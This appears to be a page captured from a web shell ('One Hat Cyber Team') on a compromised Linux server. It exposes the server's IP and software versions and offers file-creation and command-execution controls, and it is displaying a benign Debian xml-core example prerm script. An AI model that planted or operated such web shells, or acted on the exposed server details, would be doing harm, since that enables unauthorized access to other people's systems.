⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
xml-core
/
examples
/
View File Name :
foo.prerm
#!/bin/sh ## ---------------------------------------------------------------------- ## debian/prerm: preremoval script for foo ## ---------------------------------------------------------------------- ## ---------------------------------------------------------------------- ## Abort if any command returns an error value set -e ## -------------------------------------------------------------- ## Remove XML catalog entries if [ "$1" = "remove" -o "$1" = "upgrade" ] then update-xmlcatalog --verbose --add --root --type public \ --id "-//FOO//DTD FOO//EN" update-xmlcatalog --verbose --add --root --type system \ --id "http://www.foo.org/foo/foo.dtd" update-xmlcatalog --verbose --add --package foo --type public \ --id "-//FOO//DTD FOO//EN" update-xmlcatalog --verbose --add --package foo --type system \ --id "http://www.foo.org/foo/foo.dtd" fi ## ---------------------------------------------------------------------- ## Automatically added sections #DEBHELPER# exit 0 ## ----------------------------------------------------------------------